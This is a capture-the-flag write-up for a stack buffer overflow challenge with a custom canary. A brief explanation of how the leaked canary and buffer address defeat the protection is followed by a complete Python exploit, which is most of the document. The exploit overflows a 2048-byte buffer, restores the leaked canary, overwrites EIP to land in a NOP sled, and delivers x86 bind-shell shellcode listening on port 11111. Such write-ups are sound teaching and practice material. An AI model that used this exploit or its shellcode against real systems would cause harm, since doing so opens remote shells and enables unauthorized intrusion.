This level 200 challenge has a very obvious buffer overflow vulnerability, but with a little twist: the devious geniuses at ISIS labs implemented their own custom stack-canary buffer-overflow protection. Given that it is a 200-level challenge, they made things a lot easier by sending us both the canary value in use and the address of the buffer on the stack. Leaking those two values defeats the two things that would otherwise get in the way — the canary check (we simply write the leaked value back into its slot) and not knowing where the buffer lives on the stack (we know exactly where our NOP sled will land) — so with them in hand it's a straightforward buffer overflow exploit.

Exploit

import socket
import struct
import time


def pack(addr):
  """Encode ``addr`` as a 4-byte little-endian unsigned int (x86 pointer)."""
  little_endian_u32 = struct.Struct('<I')
  return little_endian_u32.pack(addr)

def unpack(addr):
  """Decode 4 little-endian bytes into an unsigned int.

  Returns the raw ``struct.unpack`` result, i.e. a one-element tuple;
  callers take ``[0]``.
  """
  little_endian_u32 = struct.Struct('<I')
  return little_endian_u32.unpack(addr)

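def _recv_exact(sock, count):
  """Read exactly ``count`` bytes from ``sock``.

  ``recv(n)`` is allowed to return fewer than ``n`` bytes.  The leaked
  buffer address and canary are consumed with fixed-size reads, so a short
  read would silently shift every later read and corrupt the payload.
  Raises EOFError if the peer closes the connection before ``count`` bytes
  arrive.
  """
  chunks = []
  remaining = count
  while remaining > 0:
    chunk = sock.recv(remaining)
    if not chunk:
      raise EOFError("connection closed after %d of %d bytes"
                     % (count - remaining, count))
    chunks.append(chunk)
    remaining -= len(chunk)
  return b"".join(chunks)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 31338))
try:
  # The service first leaks the address of the buffer on the stack: 4
  # little-endian bytes, followed by one extra byte that the exploit
  # discards (presumably a separator -- TODO confirm against the binary).
  leaked = _recv_exact(s, 5)
  buffer_address = unpack(leaked[0:4])[0]

  # Distance from the start of the buffer to our landing point.
  # Stack layout: Padding 2048 | Canary 4 | Padding 12 | EIP 4 | NOP sled + payload
  # Aim 16 bytes into the 64-byte NOP sled so a slightly-off address still
  # lands in the sled rather than in the padding.
  offset = 2048 + 4 + 12 + 4 + 16
  shellcode_addr = pack(buffer_address + offset)

  # Next the service leaks the 4-byte canary; it is written back verbatim
  # into the canary slot so the custom check passes.
  canary = _recv_exact(s, 4)

  # Drain whatever prompt/banner follows; its content is not used.
  s.recv(1024)

  ##http://www.shell-storm.org/shellcode/files/shellcode-836.php
  ##Bind shell on port 11111
  payload = (b"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02"
             b"\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68\x2b\x67"
             b"\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x89"
             b"\x51\x04\xb0\x66\xb3\x04\xcd\x80\xb0\x66\x43"
             b"\xcd\x80\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79"
             b"\xf8\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62"
             b"\x69\x6e\x89\xe3\x41\xcd\x80")

  # sendall() keeps going until the whole buffer is queued; a bare send()
  # may return early and silently truncate the overflow.
  s.sendall(b"A" * 2048 + canary + b"AAAABBBBCCCC" + shellcode_addr
            + b"\x90" * 64 + payload)
finally:
  s.close()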